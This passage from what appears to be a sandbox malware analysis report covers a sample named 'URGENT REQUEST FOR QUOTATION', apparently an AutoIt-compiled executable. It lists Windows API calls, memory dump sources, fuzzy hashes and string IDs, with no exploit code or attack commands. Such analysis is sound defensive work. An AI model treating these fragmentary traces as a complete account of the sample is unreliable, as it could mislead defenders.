                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                      • String ID: 0$2
                                                                                                                      • API String ID: 93392585-3793063076
                                                                                                                      • Opcode ID: 6ebdd1e76ee771b76961aef442c1a83c502e5f6c48df07eb5188be999dd18dfc
                                                                                                                      • Instruction ID: 397d7cc4d2680b48ac69564aec4048a7992ba1d014543532b0266e67c48b4da8
                                                                                                                      • Opcode Fuzzy Hash: 6ebdd1e76ee771b76961aef442c1a83c502e5f6c48df07eb5188be999dd18dfc
                                                                                                                      • Instruction Fuzzy Hash: C851B070A02209DBEF20CFA8EA88BAEBBF4BF45324F144159E456DB291E7709941DB51
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 0009C913
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoad
                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                      • Opcode ID: af5d3c9b298bf207a8707104844dbbd3e8800f472176784948213f51f89eac33
                                                                                                                      • Instruction ID: 62dfccbf9acd0bbe8e1e9a2e3b606f4c36231d8ba09d5cd519614c4e20125c37
                                                                                                                      • Opcode Fuzzy Hash: af5d3c9b298bf207a8707104844dbbd3e8800f472176784948213f51f89eac33
                                                                                                                      • Instruction Fuzzy Hash: 48112B35A8D30BBAFB006B54DC86CEF77DCDF15319B20002AFA00A6183D7A55D407365
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                      • String ID: 0.0.0.0
                                                                                                                      • API String ID: 642191829-3771769585
                                                                                                                      • Opcode ID: 3894f178162932e3e1e72ddc75a21ceb1066381a8e35077da3f81faa2ab41796
                                                                                                                      • Instruction ID: 4f374731afacfebe24b81d5873036af48a662841c3955204f5c632252baa1bea
                                                                                                                      • Opcode Fuzzy Hash: 3894f178162932e3e1e72ddc75a21ceb1066381a8e35077da3f81faa2ab41796
                                                                                                                      • Instruction Fuzzy Hash: F2112671904109AFEF30BB60DC4AEEF77ACDF11751F00016AF509AA092EF758A85AA60
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$LocalTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 952045576-0
                                                                                                                      • Opcode ID: 9f1e725e0b83db06a7b0b749dfa4a5e05822b4c1f869f3c00bf565448749935e
                                                                                                                      • Instruction ID: aebb186f47b63da8e41aae2210be7bec8a7ffd4ded99aa2ceb4c0c2b6f1cc888
                                                                                                                      • Opcode Fuzzy Hash: 9f1e725e0b83db06a7b0b749dfa4a5e05822b4c1f869f3c00bf565448749935e
                                                                                                                      • Instruction Fuzzy Hash: DA418E65C1021876CB21EBB4C88A9DFB7BCAF45711F508466E918E3123FB34E659C3A6
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0004F953
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0008F3D1
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0008F454
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ShowWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1268545403-0
                                                                                                                      • Opcode ID: ed3c8df6083c238ff9cd91bdd9bc143507d49fd0de72213effde5b580ee31794
                                                                                                                      • Instruction ID: dd1034f0f32012c44b671cd2989623e54749d98bbb2dc7e89cbab9e38edda851
                                                                                                                      • Opcode Fuzzy Hash: ed3c8df6083c238ff9cd91bdd9bc143507d49fd0de72213effde5b580ee31794
                                                                                                                      • Instruction Fuzzy Hash: 3E4128B0208682BAE779AF38C988F7A7BD1BF56314F14403DE0CB92561C775AD80CB15
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 000C2D1B
                                                                                                                      • GetDC.USER32(00000000), ref: 000C2D23
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000C2D2E
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 000C2D3A
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 000C2D76
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000C2D87
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 000C2DC2
                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000C2DE1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3864802216-0
                                                                                                                      • Opcode ID: 1afcd9f24f074043833279da9f03d80442525f9146762b9a2e780b73efc3418a
                                                                                                                      • Instruction ID: 20347feb13cb65336bf39967c088e7200e97f88ce8e70f6ac440186d6ad02c65
                                                                                                                      • Opcode Fuzzy Hash: 1afcd9f24f074043833279da9f03d80442525f9146762b9a2e780b73efc3418a
                                                                                                                      • Instruction Fuzzy Hash: 1A317A72201614BFFB218F54CC8AFEB3BA9EF19715F084055FE099A2A1C6799C51CBA4
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2931989736-0
                                                                                                                      • Opcode ID: e9d4afcc44cc0021113652c9cefecb544a6917023baafd9a37af74f79718c949
                                                                                                                      • Instruction ID: 924f3217c1dc2e5c39c876940cb786f9965c0aaf6e2e799cac65a44bee8629a9
                                                                                                                      • Opcode Fuzzy Hash: e9d4afcc44cc0021113652c9cefecb544a6917023baafd9a37af74f79718c949
                                                                                                                      • Instruction Fuzzy Hash: 6B219871745905779A155A229ED2FFF639DAF10386F440024FE045B582F760EE1493A5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                      • API String ID: 0-572801152
                                                                                                                      • Opcode ID: 2ce700536ce6a5c5c929bb8e6b996b3af482c353eee0cad7937a05581718d2dd
                                                                                                                      • Instruction ID: 2db25afc90c3f60bb9cc537bdf6825db09155876c17b0f624c94147a39f7580a
                                                                                                                      • Opcode Fuzzy Hash: 2ce700536ce6a5c5c929bb8e6b996b3af482c353eee0cad7937a05581718d2dd
                                                                                                                      • Instruction Fuzzy Hash: 80D18C71A0060AAFDF14DFA8CC81BEEB7F5BF48345F1484A9E915AB281E7719D41CB90
                                                                                                                      APIs
                                                                                                                      • GetCPInfo.KERNEL32(?,?), ref: 000715CE
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00071651
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000716E4
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 000716FB
                                                                                                                        • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00071777
                                                                                                                      • __freea.LIBCMT ref: 000717A2
                                                                                                                      • __freea.LIBCMT ref: 000717AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2829977744-0
                                                                                                                      • Opcode ID: 82690222fc0aa2b550de9497f26db559ace917e1d4bfc2fb777a03748eee0560
                                                                                                                      • Instruction ID: 4e1ea8a692c995e5be16e272dfa43275bd88d54a3ba74ba77d0f0a28a4f99ba4
                                                                                                                      • Opcode Fuzzy Hash: 82690222fc0aa2b550de9497f26db559ace917e1d4bfc2fb777a03748eee0560
                                                                                                                      • Instruction Fuzzy Hash: B491A371E046169ADB288E6CC881EEE7BF5AF49710F18C659E809E71C1DB39DD40CBA4
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 2610073882-625585964
                                                                                                                      • Opcode ID: f6cda6d0956860ea1c0ffad465dd7c283e5ba42c60dd85a99c2b2bb6f7c4984c
                                                                                                                      • Instruction ID: 9393ffabe03e67d0706163179a066173ddddc9f9aaeb9736c5c99e57a4ceffa2
                                                                                                                      • Opcode Fuzzy Hash: f6cda6d0956860ea1c0ffad465dd7c283e5ba42c60dd85a99c2b2bb6f7c4984c
                                                                                                                      • Instruction Fuzzy Hash: A1919471A04219AFDF24CFA5C884FEE7BB8EF46710F108559F505AB282DB709A45CFA1
                                                                                                                      APIs
                                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 000A125C
                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 000A1284
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 000A12A8
                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A12D8
                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A135F
                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A13C4
                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A1430
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2550207440-0
                                                                                                                      • Opcode ID: fa4c41582ee9efb2b57758fe15c8449ca464e8ec1a079ed455866f97c9c01d21
                                                                                                                      • Instruction ID: b45fcc2084245c86d6434f415e2ee6a4e3b1dfee7c9451190e988fbf42f2c2b8
                                                                                                                      • Opcode Fuzzy Hash: fa4c41582ee9efb2b57758fe15c8449ca464e8ec1a079ed455866f97c9c01d21
                                                                                                                      • Instruction Fuzzy Hash: 9591AF75A00209AFEB119FD8C885BFEB7B9FF46315F108029E941EB292D775E941CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3225163088-0
                                                                                                                      • Opcode ID: 145de2c4549b6239a485dd11fd3f3cebf4287acd1a500687f9ba4bbbe260f3b6
                                                                                                                      • Instruction ID: 2bde1e01ad6c2e4fc892538105805a79cd3714bb8a54ca48eb2ce312759265c6
                                                                                                                      • Opcode Fuzzy Hash: 145de2c4549b6239a485dd11fd3f3cebf4287acd1a500687f9ba4bbbe260f3b6
                                                                                                                      • Instruction Fuzzy Hash: 369139B1D00219EFCB50CFA9CC84AEEBBB8FF49320F244569E515B7251D378AA41CB64
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000B396B
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 000B3A7A
                                                                                                                      • _wcslen.LIBCMT ref: 000B3A8A
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000B3C1F
                                                                                                                        • Part of subcall function 000A0CDF: VariantInit.OLEAUT32(00000000), ref: 000A0D1F
                                                                                                                        • Part of subcall function 000A0CDF: VariantCopy.OLEAUT32(?,?), ref: 000A0D28
                                                                                                                        • Part of subcall function 000A0CDF: VariantClear.OLEAUT32(?), ref: 000A0D34
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                      • API String ID: 4137639002-1221869570
                                                                                                                      • Opcode ID: 8ce9322c5634d2de6e4e53a2489506158fa12505b476423efac388d6a00fe1cf
                                                                                                                      • Instruction ID: bfcfdcf2e9bd5f64f106a69a1bf6979de6af63be0d97887fe9dc495f295b8e7d
                                                                                                                      • Opcode Fuzzy Hash: 8ce9322c5634d2de6e4e53a2489506158fa12505b476423efac388d6a00fe1cf
                                                                                                                      • Instruction Fuzzy Hash: FA917A756083059FCB14DF28C4809AAB7E4FF89314F24892DF9899B352DB31EE05CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0009000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?,?,0009035E), ref: 0009002B
                                                                                                                        • Part of subcall function 0009000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090046
                                                                                                                        • Part of subcall function 0009000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090054
                                                                                                                        • Part of subcall function 0009000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?), ref: 00090064
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 000B4C51
                                                                                                                      • _wcslen.LIBCMT ref: 000B4D59
                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 000B4DCF
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 000B4DDA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 614568839-2785691316
                                                                                                                      • Opcode ID: 2bcf6baee4b2c58d648ead20f2068889aac64a7aaf28c5e8d9c87f943adeb85d
                                                                                                                      • Instruction ID: 4cd38c0c8ed095859b41ef12860eb408c74b2d809695baaafad255ebe0fe0ffa
                                                                                                                      • Opcode Fuzzy Hash: 2bcf6baee4b2c58d648ead20f2068889aac64a7aaf28c5e8d9c87f943adeb85d
                                                                                                                      • Instruction Fuzzy Hash: E5910571D00219AFDF15DFA4C891EEEB7B9BF48310F10816AE919A7252DB749A44CFA0
                                                                                                                      APIs
                                                                                                                      • GetMenu.USER32(?), ref: 000C2183
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 000C21B5
                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 000C21DD
                                                                                                                      • _wcslen.LIBCMT ref: 000C2213
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 000C224D
                                                                                                                      • GetSubMenu.USER32(?,?), ref: 000C225B
                                                                                                                        • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                                                                                                        • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                                                                                                        • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000C22E3
                                                                                                                        • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4196846111-0
                                                                                                                      • Opcode ID: 553c41a9444a666e84d995e5ad1945ae75db7a876f651bf7e18a7c7d77bb2a20
                                                                                                                      • Instruction ID: 6acb90261540b76171d7643eb411b54bd7f652f45886609ec08061fcbae07421
                                                                                                                      • Opcode Fuzzy Hash: 553c41a9444a666e84d995e5ad1945ae75db7a876f651bf7e18a7c7d77bb2a20
                                                                                                                      • Instruction Fuzzy Hash: 84716C75A00205AFDB15EFA4C845FAEB7F5EF48310F14846DE81AEB752DB34AE418B90
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 0009AEF9
                                                                                                                      • GetKeyboardState.USER32(?), ref: 0009AF0E
